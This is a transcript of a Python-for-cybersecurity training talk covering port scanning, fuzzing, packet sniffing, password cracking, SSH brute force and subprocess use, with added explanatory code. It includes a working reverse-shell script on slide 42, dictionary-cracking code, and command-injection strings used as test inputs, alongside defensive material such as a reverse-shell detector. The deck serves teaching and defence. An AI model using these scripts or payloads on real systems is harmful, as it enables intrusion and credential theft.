Slide 1

www.sti-innsbruck.at

Slide 2

About me: http://jmortega.github.io/

Slide 3

Books

Slide 4

Training: https://www.adrformacion.com/cursos/pythonseg/pythonseg.html

Slide 5

Agenda
• Introduction to Python for cybersecurity projects
• Pentesting tools
• Python tools from the defensive point of view
• Python tools from the offensive point of view

Slide 6

Python for cybersecurity projects
1. Designed for rapid prototyping.
2. Simple, clean structure that improves readability and ease of use.
3. Extensive standard library and easy interoperability with other tools and languages.
4. Widely adopted; most Linux distributions install it by default.

Slide 7

Python for cybersecurity projects

Slide 8

Pentesting tools

import re

# Anchored pattern. The dots must be escaped: an unescaped "." matches any
# character, so the original pattern also accepted strings like "1a2b3c4".
pattern = r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$"

input_ip = input('Enter the ip:')
if re.match(pattern, input_ip):
    # The regex only limits each field to 1-3 digits; the 0-255 range still has to be checked
    octets = input_ip.split(".")
    if all(int(octet) <= 255 for octet in octets):
        print("valid ip")
    else:
        print('No match for ip or not a valid ip')
else:
    print('No match for ip or not a valid ip')

https://docs.python.org/3/library/re.html
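Validating the target before it reaches a scanner matters for more than correctness: the value usually ends up in a command line (nmap, a shell), so anything that is not a clean address must be rejected outright. The following is an added example, not code from the talk: a strict IPv4 validator that also rejects leading zeros, plus a target expander that accepts either one address or a CIDR block via the standard `ipaddress` module and raises on everything else. The function names and the CIDR handling are this example's own additions.

```python
import ipaddress
import re
from typing import List

# Strict dotted-quad pattern: every octet is 0-255 with no leading zeros, and the
# dots are escaped so they cannot match arbitrary characters.
_OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
IPV4_RE = re.compile(rf"^{_OCTET}(?:\.{_OCTET}){{3}}$")


def is_valid_ipv4(value: str) -> bool:
    """Return True only for a canonical IPv4 address such as 192.168.1.10."""
    return IPV4_RE.match(value) is not None


def expand_targets(value: str) -> List[str]:
    """Accept a single IPv4 address or a CIDR block and return the host addresses
    to scan, as strings. Raises ValueError for anything else, so unvalidated
    input never reaches a later shell or nmap invocation."""
    if is_valid_ipv4(value):
        return [value]
    try:
        network = ipaddress.IPv4Network(value, strict=False)
    except ValueError as exc:
        raise ValueError(f"not an IPv4 address or CIDR block: {value!r}") from exc
    # hosts() skips the network and broadcast addresses of the block
    return [str(host) for host in network.hosts()]


if __name__ == "__main__":
    for candidate in ("192.168.1.1", "256.1.1.1", "01.2.3.4", "10.0.0.0/30", "1.2.3.4; rm -rf /"):
        try:
            print(candidate, "->", expand_targets(candidate))
        except ValueError as err:
            print(candidate, "-> rejected:", err)
```

Rejecting leading zeros is deliberate: "01.2.3.4" is interpreted as octal by some libc resolvers and as decimal by others, which is exactly the kind of ambiguity a scanner should refuse rather than guess at.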

Slide 9

Pentesting tools

Slide 10

Pentesting tools

import nmap

# Asynchronous scanner: scan() returns immediately and the callback runs once per host
nma = nmap.PortScannerAsync()

def callback_function(host, scan_result):
    print('RESULT ==>')
    print(host, scan_result)

# -sC runs the default NSE scripts, -Pn skips host discovery (treat the host as up)
nma.scan(hosts='127.0.0.1', arguments='-sC -Pn', callback=callback_function)
while nma.still_scanning():
    print("Waiting for the scan to finish ...")
    nma.wait(2)   # block for up to 2 seconds before polling again

https://pypi.org/project/python-nmap/
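Printing the whole `scan_result` dictionary, as the slide does, buries the interesting part. The result python-nmap passes to the callback is a dict with a `scan` key, indexed by host, then by protocol (`tcp`/`udp`), then by port, each port carrying `state`, `name`, `product` and `version` among other fields. The added example below (not part of the talk's code) flattens that structure into open-port tuples and uses it as the callback. The `SAMPLE_RESULT` dict is constructed for this example in that shape so the parser can be exercised without running nmap; its values are made up. Remember that python-nmap builds the real nmap command line from `hosts` and `arguments`, so neither should ever carry unvalidated user input.

```python
from typing import Dict, List, Tuple

# Constructed scan_result in the shape python-nmap hands to the callback.
# Values are invented for this example; they are not output from a real scan.
SAMPLE_RESULT = {
    "nmap": {
        "command_line": "nmap -oX - -sC -Pn 127.0.0.1",
        "scaninfo": {"tcp": {"method": "connect", "services": "1-1000"}},
    },
    "scan": {
        "127.0.0.1": {
            "hostnames": [{"name": "localhost", "type": "PTR"}],
            "status": {"state": "up", "reason": "user-set"},
            "tcp": {
                22: {"state": "open", "reason": "syn-ack", "name": "ssh",
                     "product": "OpenSSH", "version": "8.9p1"},
                80: {"state": "open", "reason": "syn-ack", "name": "http",
                     "product": "nginx", "version": "1.18.0"},
                443: {"state": "closed", "reason": "conn-refused", "name": "https",
                      "product": "", "version": ""},
            },
        }
    },
}


def open_ports(scan_result: Dict) -> List[Tuple[str, str, int, str]]:
    """Flatten a python-nmap result into (host, proto, port, service) tuples
    for ports whose state is 'open', sorted for stable output."""
    found = []
    for host, host_data in scan_result.get("scan", {}).items():
        for proto in ("tcp", "udp"):
            for port, info in host_data.get(proto, {}).items():
                if info.get("state") != "open":
                    continue
                # Join whatever version detection filled in, skipping empty fields
                service = " ".join(
                    s for s in (info.get("name"), info.get("product"), info.get("version")) if s
                )
                found.append((host, proto, int(port), service))
    return sorted(found)


def callback_function(host, scan_result):
    """Drop-in replacement for the slide's callback: report only what is listening."""
    for _, proto, port, service in open_ports(scan_result):
        print(f"{host} {proto}/{port} open  {service}")


if __name__ == "__main__":
    # Offline dry run against the constructed result
    callback_function("127.0.0.1", SAMPLE_RESULT)
```

With a real `PortScannerAsync`, pass this `callback_function` to `nma.scan(...)` exactly as on the slide; the parser does not care whether the dict came from a live scan or from the sample.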

Slide 11

Basic Networking

Slide 12

Port Scanning

Slide 13

Port Scanning

import socket
from concurrent import futures

def check_port(targetIp, portNumber, timeout):
    # Full TCP connect scan: a completed handshake means something is listening.
    # The context manager closes the socket whether or not the connect succeeds.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as TCPsock:
        TCPsock.settimeout(timeout)
        try:
            TCPsock.connect((targetIp, portNumber))
            return portNumber
        except OSError:
            # refused, timed out or unreachable: treat as not open
            return None

def port_scanner(targetIp, timeout):
    threadPoolSize = 500
    portsToCheck = 10000
    # Ports start at 1; port 0 is not a usable target (and would also be falsy below)
    with futures.ThreadPoolExecutor(max_workers=threadPoolSize) as executor:
        checks = [
            executor.submit(check_port, targetIp, port, timeout)
            for port in range(1, portsToCheck + 1)
        ]
        for response in futures.as_completed(checks):
            if response.result():
                print('Listening on port: {}'.format(response.result()))

Slide 14

Port Scanning

Slide 15

Banner Grabbing
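The slide names the technique without code. Banner grabbing is the step after port scanning: connect to an open port, optionally send a protocol-appropriate probe, and record whatever the service volunteers (an SSH version string, an HTTP `Server:` header, an SMTP greeting). The example below is added here and is not from the talk. So that it runs offline, it also starts a throwaway local TCP service that answers with a constructed SSH-style banner; `FAKE_BANNER` and the helper names are this example's own.

```python
import socket
import threading

# Constructed banner for the fake service; real SSH servers send a line of this form
FAKE_BANNER = b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3\r\n"


def start_fake_service(banner: bytes = FAKE_BANNER) -> int:
    """Start a throwaway TCP service on 127.0.0.1 that sends `banner` to every
    client, and return the port it listens on. Stands in for a real target."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))   # port 0: let the OS pick a free port
    listener.listen(5)

    def serve():
        while True:
            conn, _ = listener.accept()
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return listener.getsockname()[1]


def grab_banner(host: str, port: int, timeout: float = 3.0, probe: bytes = b"") -> str:
    """Connect, optionally send a probe (for HTTP something like
    b"HEAD / HTTP/1.0\\r\\n\\r\\n"), and return the first chunk the service
    sends, decoded leniently. Returns "" if the port is closed, filtered, or
    stays silent for `timeout` seconds."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            if probe:
                sock.sendall(probe)
            data = sock.recv(1024)
    except OSError:
        # connection refused, timed out, or host unreachable
        return ""
    return data.decode("utf-8", errors="replace").strip()


def demo() -> str:
    """Grab the banner from the local fake service."""
    port = start_fake_service()
    return grab_banner("127.0.0.1", port)


if __name__ == "__main__":
    print(demo())
```

Services that wait for the client to speak first (HTTP, many TLS endpoints) return nothing without a probe, which is why the function takes one; the timeout keeps a silent or filtered port from stalling a whole scan.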

Slide 16

Scraping
● Requests
○ https://docs.python-requests.org/en/master
○ HTTP requests
● BeautifulSoup
○ https://www.crummy.com/software/BeautifulSoup/bs4/doc
○ XML and HTML parser
● Scrapy
○ https://scrapy.org
○ Scraping framework

Slide 17

Scrapy

Slide 18

Subdomain extraction
● https://github.com/1N3/BlackWidow
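Scraping a target's pages for links is the simplest way to enumerate subdomains passively, and it is what tools like BlackWidow do at scale. The added example below (not from the talk or from BlackWidow) shows the core of that: pull every `href`/`src` out of an HTML document and keep the hostnames that sit under the target domain, ignoring the apex itself, other domains, and lookalikes such as `notexample.com`. It uses only the standard library's `html.parser` and `urllib.parse` so it runs without Requests or BeautifulSoup; `SAMPLE_HTML` is a constructed page standing in for a fetched response.

```python
from html.parser import HTMLParser
from typing import List, Set
from urllib.parse import urlparse

# Constructed page fragment standing in for a fetched HTML response
SAMPLE_HTML = """
<html><body>
<a href="https://dev.example.com/login">dev</a>
<a href="http://api.example.com:8443/v1">api</a>
<a href="https://example.com/about">root</a>
<a href="https://cdn.example.org/x.js">other domain</a>
<a href="//static.example.com/app.css">protocol-relative</a>
<a href="/relative/path">relative</a>
<img src="https://img.example.com/logo.png">
<a href="https://notexample.com/">lookalike</a>
</body></html>
"""


class LinkExtractor(HTMLParser):
    """Collect every URL-bearing attribute (href, src) from an HTML document."""

    def __init__(self):
        super().__init__()
        self.urls: List[str] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.urls.append(value)


def extract_subdomains(html: str, domain: str) -> Set[str]:
    """Return the hostnames under `domain` referenced by the page.
    The bare apex is excluded; hosts on other domains and lookalikes are ignored."""
    parser = LinkExtractor()
    parser.feed(html)
    suffix = "." + domain.lower()
    found = set()
    for url in parser.urls:
        # urlparse reads "//host/path" as a netloc; a relative path has no hostname
        host = urlparse(url).hostname
        if host and host.lower().endswith(suffix):
            found.add(host.lower())
    return found


if __name__ == "__main__":
    for name in sorted(extract_subdomains(SAMPLE_HTML, "example.com")):
        print(name)
```

To turn this into a crawler, feed each fetched page to `extract_subdomains`, queue the in-scope links, and keep a visited set; the matching logic stays the same.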

Slide 19

Reconspider
● https://github.com/bhavsec/reconspider

Slide 20

Reconspider

Slide 21

SpiderFoot

Slide 22

RED TEAM vs BLUE TEAM

Slide 23

SQLMap
● https://sqlmap.org

Slide 24

SQLMap

Slide 25

PwnXSS

Slide 26

Fuzzing
● Wfuzz
○ https://github.com/xmendez/wfuzz/
○ Web fuzzer framework
● Pyfuzz
○ https://github.com/AyoobAli/pyfuzz
○ Fuzzing to discover hidden files and directories
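What Pyfuzz-style tools do for hidden files and directories is conceptually small: request `base_url/<word>` for every word in a list, in parallel, and keep the paths that answer with anything other than 404. The example below is added here and is not code from either tool. It brings its own target, a local `ThreadingHTTPServer` with two existing paths and one forbidden one, so that it runs offline; `WORDLIST` and the fake site's paths are constructed for the example, and a real run would point `fuzz_paths` at the target and use a list such as dirb's `common.txt`.

```python
import threading
from concurrent.futures import ThreadPoolExecutor
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from typing import Dict, Iterable, Optional, Tuple
from urllib.error import HTTPError, URLError
from urllib.request import urlopen

# Constructed wordlist; real runs use lists such as SecLists or dirb's common.txt
WORDLIST = ["admin", "backup.zip", "login", "robots.txt", ".git/HEAD"]


class _FakeSite(BaseHTTPRequestHandler):
    """Stand-in target: two paths exist, one is forbidden, everything else is 404."""
    EXISTING = {"/admin": 200, "/backup.zip": 200, "/login": 403}

    def do_GET(self):
        status = self.EXISTING.get(self.path, 404)
        self.send_response(status)
        self.end_headers()
        self.wfile.write(b"ok" if status == 200 else b"")

    def log_message(self, *args):
        pass   # keep the example's output quiet


def start_fake_site() -> ThreadingHTTPServer:
    server = ThreadingHTTPServer(("127.0.0.1", 0), _FakeSite)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def probe(base_url: str, word: str, timeout: float = 3.0) -> Tuple[str, Optional[int]]:
    """Request base_url/word and return (word, status); None means no HTTP answer at all."""
    try:
        with urlopen(f"{base_url}/{word}", timeout=timeout) as resp:
            return word, resp.getcode()
    except HTTPError as err:
        # 4xx/5xx are still answers: a 403 says the path exists but is protected
        return word, err.code
    except URLError:
        return word, None


def fuzz_paths(base_url: str, wordlist: Iterable[str], workers: int = 10) -> Dict[str, int]:
    """Probe every word concurrently; return {word: status} for everything but 404."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda w: probe(base_url, w), wordlist))
    return {word: status for word, status in results if status not in (None, 404)}


def demo() -> Dict[str, int]:
    """Run the fuzzer against the local fake site and return what it found."""
    server = start_fake_site()
    try:
        return fuzz_paths(f"http://127.0.0.1:{server.server_address[1]}", WORDLIST)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for path, status in sorted(demo().items()):
        print(f"{status} /{path}")
```

Filtering on "not 404" is the minimum; real sites often return 200 for everything with a soft-404 page, in which case you filter on response length or a content fingerprint instead.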

Slide 27

Fuxi Scanner
● https://github.com/jeffzh3ng/fuxi

Slide 28

Fuxi Scanner

Slide 29

Packet sniffing

import socket
import struct

def ethernet_frame(data):
    # 6-byte destination MAC, 6-byte source MAC, 2-byte EtherType; '!' = network (big-endian) order
    dest_mac, src_mac, proto = struct.unpack('! 6s 6s H', data[:14])
    # '!H' already yields the EtherType in host order, so 0x0800 is IPv4.
    # The original applied socket.htons() here and then compared with 8, which only
    # works on little-endian hosts; compare the unconverted value instead.
    return format_mac_addr(dest_mac), format_mac_addr(src_mac), proto, data[14:]

def format_mac_addr(bytes_addr):
    bytes_str = map('{:02x}'.format, bytes_addr)
    return ':'.join(bytes_str).upper()

def main():
    # AF_PACKET raw socket: Linux only, needs root or CAP_NET_RAW. 0x0003 is ETH_P_ALL,
    # and the protocol argument of this socket type is expected in network byte order.
    conn = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
    while True:
        raw_data, addr = conn.recvfrom(65535)
        dest_mac, src_mac, eth_proto, data = ethernet_frame(raw_data)
        if eth_proto == 0x0800:   # IPv4
            print('\nEthernet Frame:')
            print('Destination: {}, Source: {}, Protocol: {:#06x}'.format(dest_mac, src_mac, eth_proto))
            print(data)

if __name__ == "__main__":
    main()
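The slide stops after the Ethernet header and prints the raw IPv4 bytes. The added example below (not code from the talk) continues the same `struct` approach one layer down: it decodes the fixed IPv4 header, honours the IHL field so options do not get mistaken for payload, and names the transport protocol. `SAMPLE_FRAME` is a frame built with `struct.pack` for this example, not a capture, so the parser can be exercised without a raw socket; the `sniff()` function at the end is the live version and needs Linux and CAP_NET_RAW.

```python
import socket
import struct
from typing import Dict, Tuple

ETH_P_IP = 0x0800  # EtherType for IPv4 as it appears on the wire

# Constructed frame: Ethernet header + minimal IPv4 header (no options) + 4 bytes of
# payload. Checksum is left at 0 because this parser does not verify it.
SAMPLE_FRAME = (
    bytes.fromhex("001122334455")                       # destination MAC
    + bytes.fromhex("66778899aabb")                     # source MAC
    + struct.pack("!H", ETH_P_IP)                       # EtherType
    + struct.pack("!BBHHHBBH4s4s",
                  0x45,                                 # version 4, IHL 5 (20 bytes)
                  0x00,                                 # TOS
                  24,                                   # total length = 20 header + 4 payload
                  0x1234,                               # identification
                  0x4000,                               # flags: don't fragment, offset 0
                  64,                                   # TTL
                  6,                                    # protocol: TCP
                  0,                                    # checksum (not computed here)
                  socket.inet_aton("10.0.0.5"),
                  socket.inet_aton("93.184.216.34"))
    + b"\xde\xad\xbe\xef"
)

PROTO_NAMES = {1: "ICMP", 6: "TCP", 17: "UDP"}


def format_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw).upper()


def parse_ethernet(frame: bytes) -> Tuple[str, str, int, bytes]:
    """Return (dst_mac, src_mac, ethertype, payload). '!H' gives the EtherType in
    host order already; do not run htons/ntohs over it again."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    return format_mac(dst), format_mac(src), ethertype, frame[14:]


def parse_ipv4(data: bytes) -> Dict:
    """Decode the fixed IPv4 header. IHL (in 32-bit words) tells where any options
    end and the transport header begins; total length bounds the payload."""
    (version_ihl, _tos, total_len, _ident, _flags_frag,
     ttl, proto, _checksum, src, dst) = struct.unpack("!BBHHHBBH4s4s", data[:20])
    version = version_ihl >> 4
    ihl = (version_ihl & 0x0F) * 4
    if version != 4 or ihl < 20:
        raise ValueError("not an IPv4 header")
    return {
        "version": version, "header_len": ihl, "total_len": total_len, "ttl": ttl,
        "protocol": PROTO_NAMES.get(proto, str(proto)),
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
        "payload": data[ihl:total_len],
    }


def parse_frame(frame: bytes) -> Dict:
    dst_mac, src_mac, ethertype, payload = parse_ethernet(frame)
    result = {"dst_mac": dst_mac, "src_mac": src_mac, "ethertype": ethertype}
    if ethertype == ETH_P_IP:
        result["ip"] = parse_ipv4(payload)
    return result


def sniff(count: int = 5) -> None:
    """Live version (Linux, root/CAP_NET_RAW): the same parser over raw frames."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003)) as conn:
        for _ in range(count):
            frame, _ = conn.recvfrom(65535)
            print(parse_frame(frame))


if __name__ == "__main__":
    print(parse_frame(SAMPLE_FRAME))
```

Slicing the payload as `data[ihl:total_len]` rather than `data[20:]` is the detail that matters on real traffic: frames shorter than 60 bytes are padded by the NIC, and headers with options are longer than 20 bytes, so both bounds come from the header itself.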

Slide 30

Packet manipulation
● Scapy
○ https://scapy.net
○ Packet manipulation and decoding.
○ Send, sniff, dissect and forge network packets.

Slide 31

Packet manipulation

from scapy.all import sniff, IP

packetCount = 0

def customAction(packet):
    global packetCount
    packetCount += 1
    # Index the IP layer by class rather than by position in the packet
    return "{}) {} -> {}".format(packetCount, packet[IP].src, packet[IP].dst)

## Set up sniffing (needs root), filtering for IP traffic; prn is called for every packet
sniff(filter="ip", prn=customAction)

Slide 32

Packet manipulation

from scapy.all import IP, ls

if __name__ == "__main__":
    dest_ip = "www.google.com"   # a hostname is resolved when the layer is built
    ip_layer = IP(dst=dest_ip)
    ls(ip_layer)   # display the complete layer info (ls prints and returns None)
    # accessing the fields
    print("Destination = ", ip_layer.dst)
    print("Summary = ", ip_layer.summary())

Slide 33

Packet sniffing

from scapy.all import sniff, Raw

def main():
    # Needs root; only plaintext HTTP on port 80 is visible this way
    sniff(prn=http_header, filter="tcp port 80")

def http_header(packet):
    # Look only at segments that carry a payload beginning with an HTTP request line.
    # (The original tested str(packet).find('GET'), which is truthy when the
    # substring is absent because find() returns -1.)
    if packet.haslayer(Raw):
        payload = bytes(packet[Raw].load)
        if payload.startswith(b"GET") or payload.startswith(b"POST"):
            return print_packet(payload)

def print_packet(payload):
    ret = "-------------------------------[ Received Packet ] -------------------------------\n"
    # HTTP headers are separated by CRLF; print one per line
    ret += "\n".join(payload.decode("utf-8", errors="replace").split("\r\n"))
    ret += "\n---------------------------------------------------------------------------------\n"
    return ret

if __name__ == '__main__':
    main()

Slide 34

Exploitation
● CrackMapExec
○ https://github.com/byt3bl33d3r/CrackMapExec
○ Maps the network, harvests credentials and executes commands.
● DeathStar
○ https://github.com/byt3bl33d3r/DeathStar
■ Automates privilege escalation in an Active Directory environment.

Slide 35

Password cracking

import zipfile

encrypted_filename = "secret_file.zip"
# zipfile only handles the legacy ZipCrypto scheme; AES-encrypted archives need another library
with zipfile.ZipFile(encrypted_filename, "r") as zFile, open("passwords.txt", "r") as passFile:
    for line in passFile:
        test_password = line.strip("\n").encode('utf-8')
        try:
            print(test_password)
            zFile.extractall(pwd=test_password)
            print("Match found")
            break
        except Exception:
            # a wrong password raises (usually RuntimeError); move on to the next candidate
            pass
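The zip loop above is one instance of a general pattern: take a stored verifier, derive each candidate from a wordlist the same way the target does, and compare. The added example below (not from the talk) shows that pattern against a PBKDF2-HMAC-SHA256 verifier, which is what an offline attack on a leaked password database looks like, and adds the cheap mangling rules (case variants, common suffixes) that turn a small wordlist into a much larger candidate set. The wordlist, salt and iteration count are constructed for the example; real attacks use far larger lists and real deployments use far higher iteration counts.

```python
import hashlib
from typing import Iterable, Iterator, Optional, Set

ITERATIONS = 1000  # deliberately low so the demo runs instantly; production uses many more

# Constructed wordlist; real attacks use rockyou.txt-style lists
WORDLIST = ["letmein", "password", "dragon"]
SALT = b"\x00" * 8  # fixed salt for reproducibility of the example only


def derive(password: str, salt: bytes, iterations: int = ITERATIONS) -> bytes:
    """PBKDF2-HMAC-SHA256: the kind of stored verifier an offline attack targets."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)


def mangle(word: str) -> Iterator[str]:
    """Cheap rule set: case variants of the word, each with common suffixes appended."""
    bases = {word, word.lower(), word.capitalize(), word.upper()}
    for base in sorted(bases):
        yield base
        for suffix in ("1", "123", "!", "2024"):
            yield base + suffix


def crack(target: bytes, salt: bytes, wordlist: Iterable[str],
          iterations: int = ITERATIONS) -> Optional[str]:
    """Dictionary attack: derive every candidate with the target's own salt and
    parameters and compare. Returns the recovered password, or None."""
    seen: Set[str] = set()
    for word in wordlist:
        for candidate in mangle(word.strip()):
            if candidate in seen:
                continue   # rules often regenerate the same string; derive it once
            seen.add(candidate)
            if derive(candidate, salt, iterations) == target:
                return candidate
    return None


if __name__ == "__main__":
    stored = derive("Password1", SALT)   # what a breached database row would hold
    print("recovered:", crack(stored, SALT, WORDLIST))
```

Two things this makes visible that the zip snippet hides: the cost of each guess is set by the defender (the iteration count), and a per-user salt means the whole derivation has to be redone for every account rather than once per candidate.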

Slide 36

SSH brute force

import paramiko

ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
# Accept unknown host keys automatically: acceptable in a lab, never in production
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# A brute-force loop repeats this connect() once per candidate password,
# catching paramiko.AuthenticationException on each failure
ssh.connect('127.0.0.1', username='user', password='password', timeout=5)
stdin, stdout, stderr = ssh.exec_command("uname -a")
print(stdout.read().decode())
ssh.close()

Slide 37

SSH brute force

Slide 38

Process execution
https://docs.python.org/3/library/subprocess.html

import subprocess
# shell=True hands the string to /bin/sh: convenient, but command injection if user input is interpolated
subprocess.run('ls -la', shell=True)
# argument list, no shell: each element is passed verbatim to the program
subprocess.run(['ls', '-la'])

Slide 39

Process execution
https://docs.python.org/3/library/subprocess.html

import subprocess

process = subprocess.run(['which', 'python3'], capture_output=True)
if process.returncode != 0:
    raise OSError('Sorry python3 is not installed')
# stdout is bytes unless text=True is passed, so decode before printing
python_bin = process.stdout.decode().strip()
print(f'Python found in: {python_bin}')

The CompletedProcess object returned by run() looks like this:
CompletedProcess(args=['which', 'python3'], returncode=0, stdout=b'/usr/bin/python3\n', stderr=b'')

Slide 40

Process execution
https://docs.python.org/3/library/subprocess.html

from pathlib import Path
import subprocess

source = Path("/home/linux")
cmd = ["ls", "-l", source]            # Path objects are accepted as arguments
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
stdout, stderr = proc.communicate()   # stderr is None here because it was not redirected
print(stdout.decode("utf-8").split('\n')[:-1])   # [:-1] drops the trailing empty element
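The difference between the two `run()` forms on slide 38 is the whole security story of `subprocess`, so here it is made concrete. The following is an added example, not code from the talk: the same "filename" is passed to a command three ways, with `shell=True` (a second command runs), as an argument list (the string is one harmless argument), and with `shlex.quote` for the cases where a shell really is needed. `USER_INPUT` is a constructed attacker-controlled value, and `echo` is used in place of `ls` so the output is deterministic; the example assumes a POSIX `/bin/sh`.

```python
import shlex
import subprocess

# Constructed "filename" carrying a shell metacharacter payload
USER_INPUT = "report.txt; echo INJECTED"


def run_with_shell(name: str) -> str:
    """Vulnerable: /bin/sh parses the string, so ';' starts a second command."""
    result = subprocess.run(f"echo {name}", shell=True, capture_output=True, text=True)
    return result.stdout


def run_with_list(name: str) -> str:
    """Safe: argv list and no shell, so the whole string is a single argument to echo."""
    result = subprocess.run(["echo", name], capture_output=True, text=True)
    return result.stdout


def run_with_quoting(name: str) -> str:
    """When a shell is unavoidable (pipes, globbing), shlex.quote makes the value
    a single shell word; metacharacters inside it are no longer interpreted."""
    result = subprocess.run(f"echo {shlex.quote(name)}", shell=True, capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    print("shell=True      :", repr(run_with_shell(USER_INPUT)))
    print("argument list   :", repr(run_with_list(USER_INPUT)))
    print("shlex.quote     :", repr(run_with_quoting(USER_INPUT)))
```

The list form should be the default; `shlex.quote` is the fallback for the rare command line that genuinely needs shell features, never a reason to keep `shell=True` everywhere.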

Slide 41

Reverse shell

Slide 42

Reverse shell

#!/usr/bin/python3
import socket
import subprocess
import os

# Connect back to the listener (for example nc -lvnp 45679 on the attacker host)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 45679))
# Point stdin, stdout and stderr of this process at the socket
os.dup2(sock.fileno(), 0)
os.dup2(sock.fileno(), 1)
os.dup2(sock.fileno(), 2)
# The interactive shell inherits the redirected descriptors, so it talks to the listener
shell_remote = subprocess.call(["/bin/sh", "-i"])
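The three `dup2()` calls are also the reverse shell's fingerprint: afterwards, file descriptors 0, 1 and 2 of the shell all resolve to the same socket, which an interactive login never looks like. The agenda lists the defensive point of view too, so the added example below (not from the talk) checks for exactly that on Linux by reading the `/proc/<pid>/fd/{0,1,2}` symlinks. The function names are this example's own; off Linux, or for processes you lack permission to inspect, it simply reports nothing.

```python
import os
from typing import Dict, List


def is_socket_link(target: str) -> bool:
    """True when a /proc/<pid>/fd/N symlink resolves to a socket inode."""
    return target.startswith("socket:[")


def std_fd_targets(pid: int) -> Dict[int, str]:
    """Read where fds 0, 1 and 2 of `pid` point (Linux /proc only)."""
    targets = {}
    for fd in (0, 1, 2):
        try:
            targets[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:
            # process exited, fd closed, or no permission (other users' processes)
            continue
    return targets


def looks_like_reverse_shell(targets: Dict[int, str]) -> bool:
    """The dup2() pattern leaves stdin, stdout and stderr all on a socket."""
    return len(targets) == 3 and all(is_socket_link(t) for t in targets.values())


def find_suspicious_processes() -> List[int]:
    """Walk /proc and return PIDs whose standard fds are all sockets; [] off Linux."""
    if not os.path.isdir("/proc"):
        return []
    hits = []
    for entry in os.listdir("/proc"):
        if entry.isdigit() and looks_like_reverse_shell(std_fd_targets(int(entry))):
            hits.append(int(entry))
    return hits


if __name__ == "__main__":
    for pid in find_suspicious_processes():
        try:
            with open(f"/proc/{pid}/comm") as f:
                name = f.read().strip()
        except OSError:
            name = "?"
        print(f"pid {pid} ({name}): stdin/stdout/stderr are all sockets")
```

Expect benign hits from inetd-style or socket-activated daemons, which legitimately inherit a socket as stdio; the signal becomes strong when the process is a shell or an interpreter and the socket's peer is an external address.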

Slide 43

Books

Slide 44

Books
https://github.com/PacktPublishing/Python-Ethical-Hacking
https://github.com/PacktPublishing/Python-for-Offensive-PenTest

Slide 45

GitHub repository: https://github.com/jmortega/python_ciberseguridad_2021
